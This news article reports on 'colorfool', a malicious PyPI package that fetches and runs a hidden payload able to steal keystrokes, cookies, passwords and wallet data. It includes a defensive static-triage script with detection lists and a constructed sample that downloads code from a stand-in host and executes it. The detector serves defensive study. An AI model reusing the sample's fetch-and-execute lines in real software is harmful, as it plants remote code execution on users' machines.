Another PyPI package was found to be just a payload of malware

Security researchers have discovered another malicious PyPI package, whose goal is to steal people’s sensitive data and allow unauthenticated users to access the compromised endpoint.

They said the package, called “colorfool”, was clearly harmful. It contained a “suspiciously large” Python file whose only job was to download another file from the Internet and run it, making sure it remained hidden from the machine’s user.

“The post immediately looked suspicious and potentially malicious,” the report stated.

Borrowed code

To make matters worse, that wasn’t the only suspicious thing in this file. The URL from which the package needs to download the payload is hard-coded, which is another red flag.
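The red flags described so far (a single oversized source file, a hard-coded URL, and a fetch-then-run pattern) can be checked mechanically before a package is installed. The following static triage script is an added example written for this article, not code from the researchers or from the package itself; the call lists, the size threshold and the sample source are constructed assumptions.

```python
"""Static triage of a Python source file for the red flags named in the article."""
import ast
import re

# Call targets that fetch remote content, and call targets that execute code (assumed lists).
DOWNLOAD_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get"}
EXEC_CALLS = {"exec", "eval", "subprocess.Popen", "subprocess.run", "os.system"}
URL_RE = re.compile(r'https?://[^\s"\']+')
LARGE_FILE_BYTES = 50_000  # constructed threshold for a "suspiciously large" file


def _dotted_name(node: ast.AST) -> str:
    """Render a call target such as urllib.request.urlopen as a dotted string."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted_name(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def triage_source(source: str) -> dict:
    """Return the red flags found in one Python source string."""
    tree = ast.parse(source)
    calls = {_dotted_name(n.func) for n in ast.walk(tree) if isinstance(n, ast.Call)}
    return {
        "hardcoded_urls": sorted(set(URL_RE.findall(source))),
        "downloads": sorted(c for c in calls if c in DOWNLOAD_CALLS),
        "executes": sorted(c for c in calls if c in EXEC_CALLS),
        "large_file": len(source.encode()) > LARGE_FILE_BYTES,
    }


def is_download_and_execute(flags: dict) -> bool:
    """The combination the article describes: fetch from a fixed URL, then run the result."""
    return bool(flags["hardcoded_urls"] and flags["downloads"] and flags["executes"])


# Constructed sample that mimics the described pattern; it is not the real package code.
SAMPLE = '''
import urllib.request, subprocess
URL = "http://example.invalid/payload.py"
urllib.request.urlretrieve(URL, "/tmp/payload.py")
subprocess.Popen(["python", "/tmp/payload.py"])
'''

if __name__ == "__main__":
    result = triage_source(SAMPLE)
    print(result, "-> download-and-execute:", is_download_and_execute(result))
```

Run it over every `.py` file in an unpacked sdist or wheel; a hit on all three flags is a strong reason to quarantine the package for manual review rather than install it.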

A Python script – code.py – carries information-stealing functions, such as keylogging and cookie extraction. Besides, it was capable of stealing passwords, killing apps, taking screenshots, stealing encrypted wallet data, and even using the device’s webcam.

What makes this package different from all the other malicious PyPI packages that security researchers discover on an almost daily basis is its Frankenstein-like nature. The researchers suggest that the code was patched together from pieces of other people’s work, sometimes without regard to logic, code flow, or anything else, as if the author had simply copied and pasted bits of code, often leaving redundant code sitting there unused.

“The combination of the obfuscation along with the blatantly malicious code indicates that it is unlikely that all of the code was developed by a single entity,” the researchers said. “It is possible that the final developer has mostly used other people’s code, and added it by copying and pasting.”

In fact, the code even contains the game “Snake”, which does not appear to serve any purpose at all.

For researchers, this is a great example of “democratization of cybercrime,” where threat actors can simply take code from other threat actors and incorporate it into their work.

Via: The Register
